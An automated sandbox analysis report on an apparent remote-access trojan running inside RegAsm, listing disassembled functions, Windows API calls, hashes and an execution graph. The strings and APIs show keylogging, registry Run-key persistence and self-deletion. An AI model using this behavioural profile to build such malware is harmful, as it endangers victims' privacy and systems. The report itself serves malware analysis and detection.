                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                        • String ID: [AltL]$[AltR]
                                                                        • API String ID: 2738857842-2658077756
                                                                        • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                        • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                        Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: uD
                                                                        • API String ID: 0-2547262877
                                                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                        Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID: !D@$open
                                                                        • API String ID: 587946157-1586967515
                                                                        • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                        • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                        Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                        • API String ID: 1649606143-2446555240
                                                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                        Function 0043C1C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                                                          • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                                                                          • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                                                                        • DeleteCriticalSection.KERNEL32(0054E808), ref: 0043C1F1
                                                                        • _free.LIBCMT ref: 0043C205
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$CriticalDeleteSection
                                                                        • String ID: (T
                                                                        • API String ID: 1906768660-1256210051
                                                                        • Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                                                        • Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
                                                                        • Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                                                        • Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D
                                                                        Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 1881088180-2015055088
                                                                        • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                        • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                        Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                        • API String ID: 2654517830-1051519024
                                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                        Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteDirectoryFileRemove
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3325800564-4028850238
                                                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                        Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1872346434-4028850238
                                                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                        Function 0041BAE6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastInputInfo.USER32(NG), ref: 0041BAF6
                                                                        • GetTickCount.KERNEL32(?,?,?,00415BA3), ref: 0041BAFC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountInfoInputLastTick
                                                                        • String ID: NG
                                                                        • API String ID: 3478931382-1651712548
                                                                        • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                        • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                        • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                        • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                        Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                        • GetLastError.KERNEL32 ref: 00440D35
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1717984340-0
                                                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                        Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastRead
                                                                        • String ID:
                                                                        • API String ID: 4100373531-0
                                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                                                                        Execution Graph

                                                                        Execution Coverage:6%
                                                                        Dynamic/Decrypted Code Coverage:9.2%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:66
                                                                        execution_graph 37930 44660a 37933 4465e4 37930->37933 37932 446613 37934 4465f3 __dllonexit 37933->37934 37935 4465ed _onexit 37933->37935 37934->37932 37935->37934 37722 442ec6 19 API calls 37899 4152c6 malloc 37900 4152e2 37899->37900 37901 4152ef 37899->37901 37903 416760 11 API calls 37901->37903 37903->37900 37904 4232e8 37905 4232ef 37904->37905 37908 415b2c 37905->37908 37907 423305 37909 415b42 37908->37909 37913 415b46 37908->37913 37910 415b94 37909->37910 37911 415b5a 37909->37911 37909->37913 37915 4438b5 37910->37915 37911->37913 37914 415b79 memcpy 37911->37914 37913->37907 37914->37913 37916 4438d0 37915->37916 37925 4438c9 37915->37925 37929 415378 memcpy memcpy 37916->37929 37925->37913 37936 4466f4 37955 446904 37936->37955 37938 446700 GetModuleHandleA 37941 446710 __set_app_type __p__fmode __p__commode 37938->37941 37940 4467a4 37942 4467ac __setusermatherr 37940->37942 37943 4467b8 37940->37943 37941->37940 37942->37943 37956 4468f0 _controlfp 37943->37956 37945 4467bd _initterm GetEnvironmentStringsW _initterm 37946 44681e GetStartupInfoW 37945->37946 37947 446810 37945->37947 37949 446866 GetModuleHandleA 37946->37949 37957 41276d 37949->37957 37953 446896 exit 37954 44689d _cexit 37953->37954 37954->37947 37955->37938 37956->37945 37958 41277d 37957->37958 38000 4044a4 LoadLibraryW 37958->38000 37960 412785 37961 412789 37960->37961 38006 414b81 37960->38006 37961->37953 37961->37954 37964 4127c8 38010 412465 memset ??2@YAPAXI 37964->38010 37966 4127ea 38022 40ac21 37966->38022 37971 412813 38040 40dd07 memset 37971->38040 37972 412827 38045 40db69 memset 37972->38045 37975 412822 38067 4125b6 ??3@YAXPAX DeleteObject 37975->38067 37977 40ada2 _wcsicmp 37978 41283d 37977->37978 37978->37975 37981 412863 CoInitialize 37978->37981 38050 41268e 37978->38050 37980 412966 38068 40b1ab ??3@YAXPAX ??3@YAXPAX 37980->38068 38066 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37981->38066 37985 41296f 38069 40b633 37985->38069 37987 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37992 412957 CoUninitialize 37987->37992 37997 4128ca 37987->37997 37992->37975 37993 4128d0 TranslateAcceleratorW 37994 412941 GetMessageW 37993->37994 37993->37997 37994->37992 37994->37993 37995 412909 IsDialogMessageW 37995->37994 37995->37997 37996 4128fd IsDialogMessageW 37996->37994 37996->37995 37997->37993 37997->37995 37997->37996 37998 41292b TranslateMessage DispatchMessageW 37997->37998 37999 41291f IsDialogMessageW 37997->37999 37998->37994 37999->37994 37999->37998 38001 4044f3 38000->38001 38005 4044cf FreeLibrary 38000->38005 38003 404507 MessageBoxW 38001->38003 38004 40451e 38001->38004 38003->37960 38004->37960 38005->38001 38007 414b8a 38006->38007 38008 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38006->38008 38073 40a804 memset 38007->38073 38008->37964 38011 4124e0 38010->38011 38012 412505 ??2@YAPAXI 38011->38012 38013 412521 38012->38013 38014 41251c 38012->38014 38084 444722 38013->38084 38095 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38014->38095 38021 41259b wcscpy 38021->37966 38100 40b1ab ??3@YAXPAX ??3@YAXPAX 38022->38100 38026 40ac5c 38027 40ad4b 38026->38027 38028 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38026->38028 38030 40ace7 ??3@YAXPAX 38026->38030 38035 40ad76 38026->38035 38104 40a8d0 38026->38104 38116 4099f4 38026->38116 38027->38035 38124 40a9ce 38027->38124 38028->38026 38030->38026 38034 40a8d0 7 API calls 38034->38035 38101 40aa04 38035->38101 38036 40ada2 38037 40adc9 38036->38037 38038 40adaa 38036->38038 38037->37971 38037->37972 38038->38037 38039 40adb3 _wcsicmp 38038->38039 38039->38037 38039->38038 38129 40dce0 38040->38129 38042 40dd3a GetModuleHandleW 38134 40dba7 38042->38134 38046 40dce0 3 API calls 38045->38046 38047 40db99 38046->38047 38206 40dae1 38047->38206 38220 402f3a 38050->38220 38052 412766 38052->37975 38052->37981 38053 4126d3 _wcsicmp 38054 4126a8 38053->38054 38054->38052 38054->38053 38056 41270a 38054->38056 38255 4125f8 7 API calls 38054->38255 38056->38052 38223 411ac5 38056->38223 38066->37987 38067->37980 38068->37985 38070 40b640 38069->38070 38071 40b639 ??3@YAXPAX 38069->38071 38072 40b1ab ??3@YAXPAX ??3@YAXPAX 38070->38072 38071->38070 38072->37961 38074 40a83b GetSystemDirectoryW 38073->38074 38075 40a84c wcscpy 38073->38075 38074->38075 38080 409719 wcslen 38075->38080 38078 40a881 LoadLibraryW 38079 40a886 38078->38079 38079->38008 38081 409724 38080->38081 38082 409739 wcscat LoadLibraryW 38080->38082 38081->38082 38083 40972c wcscat 38081->38083 38082->38078 38082->38079 38083->38082 38085 444732 38084->38085 38086 444728 DeleteObject 38084->38086 38096 409cc3 38085->38096 38086->38085 38088 412551 38089 4010f9 38088->38089 38090 401130 38089->38090 38091 401134 GetModuleHandleW LoadIconW 38090->38091 38092 401107 wcsncat 38090->38092 38093 40a7be 38091->38093 38092->38090 38094 40a7d2 38093->38094 38094->38021 38094->38094 38095->38013 38099 409bfd memset wcscpy 38096->38099 38098 409cdb CreateFontIndirectW 38098->38088 38099->38098 38100->38026 38102 40aa14 38101->38102 38103 40aa0a ??3@YAXPAX 38101->38103 38102->38036 38103->38102 38105 40a8eb 38104->38105 38106 40a8df wcslen 38104->38106 38107 40a906 ??3@YAXPAX 38105->38107 38108 40a90f 38105->38108 38106->38105 38112 40a919 38107->38112 38109 4099f4 3 API calls 38108->38109 38109->38112 38110 40a932 38114 4099f4 3 API calls 38110->38114 38111 40a929 ??3@YAXPAX 38113 40a93e memcpy 38111->38113 38112->38110 38112->38111 38113->38026 38115 40a93d 38114->38115 38115->38113 38117 409a41 38116->38117 38118 4099fb malloc 38116->38118 38117->38026 38120 409a37 38118->38120 38121 409a1c 38118->38121 38120->38026 38122 409a30 ??3@YAXPAX 38121->38122 38123 409a20 memcpy 38121->38123 38122->38120 38123->38122 38125 40a9e7 38124->38125 38126 40a9dc ??3@YAXPAX 38124->38126 38128 4099f4 3 API calls 38125->38128 38127 40a9f2 38126->38127 38127->38034 38128->38127 38153 409bca GetModuleFileNameW 38129->38153 38131 40dce6 wcsrchr 38132 40dcf5 38131->38132 38133 40dcf9 wcscat 38131->38133 38132->38133 38133->38042 38154 44db70 38134->38154 38138 40dbfd 38157 4447d9 38138->38157 38141 40dc34 wcscpy wcscpy 38183 40d6f5 38141->38183 38142 40dc1f wcscpy 38142->38141 38145 40d6f5 3 API calls 38146 40dc73 38145->38146 38147 40d6f5 3 API calls 38146->38147 38148 40dc89 38147->38148 38149 40d6f5 3 API calls 38148->38149 38150 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38149->38150 38189 40da80 38150->38189 38153->38131 38155 40dbb4 memset memset 38154->38155 38156 409bca GetModuleFileNameW 38155->38156 38156->38138 38159 4447f4 38157->38159 38158 40dc1b 38158->38141 38158->38142 38159->38158 38160 444807 ??2@YAPAXI 38159->38160 38161 44481f 38160->38161 38162 444873 _snwprintf 38161->38162 38163 4448ab wcscpy 38161->38163 38196 44474a 8 API calls 38162->38196 38165 4448bb 38163->38165 38197 44474a 8 API calls 38165->38197 38166 4448a7 38166->38163 38166->38165 38168 4448cd 38198 44474a 8 API calls 38168->38198 38170 4448e2 38199 44474a 8 API calls 38170->38199 38172 4448f7 38200 44474a 8 API calls 38172->38200 38174 44490c 38201 44474a 8 API calls 38174->38201 38176 444921 38202 44474a 8 API calls 38176->38202 38178 444936 38203 44474a 8 API calls 38178->38203 38180 44494b 38204 44474a 8 API calls 38180->38204 38182 444960 ??3@YAXPAX 38182->38158 38184 44db70 38183->38184 38185 40d702 memset GetPrivateProfileStringW 38184->38185 38186 40d752 38185->38186 38187 40d75c WritePrivateProfileStringW 38185->38187 38186->38187 38188 40d758 38186->38188 38187->38188 38188->38145 38190 44db70 38189->38190 38191 40da8d memset 38190->38191 38192 40daac LoadStringW 38191->38192 38195 40dac6 38192->38195 38194 40dade 38194->37975 38195->38192 38195->38194 38205 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38195->38205 38196->38166 38197->38168 38198->38170 38199->38172 38200->38174 38201->38176 38202->38178 38203->38180 38204->38182 38205->38195 38216 409b98 GetFileAttributesW 38206->38216 38208 40daea 38209 40daef wcscpy wcscpy GetPrivateProfileIntW 38208->38209 38215 40db63 38208->38215 38217 40d65d GetPrivateProfileStringW 38209->38217 38211 40db3e 38218 40d65d GetPrivateProfileStringW 38211->38218 38213 40db4f 38219 40d65d GetPrivateProfileStringW 38213->38219 38215->37977 38216->38208 38217->38211 38218->38213 38219->38215 38256 40eaff 38220->38256 38224 411ae2 memset 38223->38224 38225 411b8f 38223->38225 38297 409bca GetModuleFileNameW 38224->38297 38237 411a8b 38225->38237 38227 411b0a wcsrchr 38228 411b22 wcscat 38227->38228 38229 411b1f 38227->38229 38298 414770 wcscpy wcscpy wcscpy CloseHandle 38228->38298 38229->38228 38231 411b67 38299 402afb 38231->38299 38235 411b7f 38355 40ea13 SendMessageW memset SendMessageW 38235->38355 38238 402afb 27 API calls 38237->38238 38239 411ac0 38238->38239 38240 4110dc 38239->38240 38241 41113e 38240->38241 38246 4110f0 38240->38246 38380 40969c LoadCursorW SetCursor 38241->38380 38243 411143 38254 40b04b ??3@YAXPAX 38243->38254 38381 444a54 38243->38381 38384 4032b4 38243->38384 38244 4110f7 _wcsicmp 38244->38246 38245 411157 38247 40ada2 _wcsicmp 38245->38247 38246->38241 38246->38244 38402 410c46 10 API calls 38246->38402 38250 411167 38247->38250 38248 4111af 38250->38248 38251 4111a6 qsort 38250->38251 38251->38248 38254->38245 38255->38054 38257 40eb10 38256->38257 38270 40e8e0 38257->38270 38260 40eb6c memcpy memcpy 38261 40ebe1 38260->38261 38262 40ebb7 38260->38262 38261->38260 38263 40ebf2 ??2@YAPAXI ??2@YAPAXI 38261->38263 38262->38261 38264 40d134 16 API calls 38262->38264 38265 40ec65 38263->38265 38266 40ec2e ??2@YAPAXI 38263->38266 38264->38262 38280 40ea7f 38265->38280 38266->38265 38269 402f49 38269->38054 38271 40e8f2 38270->38271 38272 40e8eb ??3@YAXPAX 38270->38272 38273 40e900 38271->38273 38274 40e8f9 ??3@YAXPAX 38271->38274 38272->38271 38275 40e911 38273->38275 38276 40e90a ??3@YAXPAX 38273->38276 38274->38273 38277 40e931 ??2@YAPAXI ??2@YAPAXI 38275->38277 38278 40e921 ??3@YAXPAX 38275->38278 38279 40e92a ??3@YAXPAX 38275->38279 38276->38275 38277->38260 38278->38279 38279->38277 38281 40aa04 ??3@YAXPAX 38280->38281 38282 40ea88 38281->38282 38283 40aa04 ??3@YAXPAX 38282->38283 38284 40ea90 38283->38284 38285 40aa04 ??3@YAXPAX 38284->38285 38286 40ea98 38285->38286 38287 40aa04 ??3@YAXPAX 38286->38287 38288 40eaa0 38287->38288 38289 40a9ce 4 API calls 38288->38289 38290 40eab3 38289->38290 38291 40a9ce 4 API calls 38290->38291 38292 40eabd 38291->38292 38293 40a9ce 4 API calls 38292->38293 38294 40eac7 38293->38294 38295 40a9ce 4 API calls 38294->38295 38296 40ead1 38295->38296 38296->38269 38297->38227 38298->38231 38356 40b2cc 38299->38356 38301 402b0a 38302 40b2cc 27 API calls 38301->38302 38303 402b23 38302->38303 38304 40b2cc 27 API calls 38303->38304 38305 402b3a 38304->38305 38306 40b2cc 27 API calls 38305->38306 38307 402b54 38306->38307 38308 40b2cc 27 API calls 38307->38308 38309 402b6b 38308->38309 38310 40b2cc 27 API calls 38309->38310 38311 402b82 38310->38311 38312 40b2cc 27 API calls 38311->38312 38313 402b99 38312->38313 38314 40b2cc 27 API calls 38313->38314 38315 402bb0 38314->38315 38316 40b2cc 27 API calls 38315->38316 38317 402bc7 38316->38317 38318 40b2cc 27 API calls 38317->38318 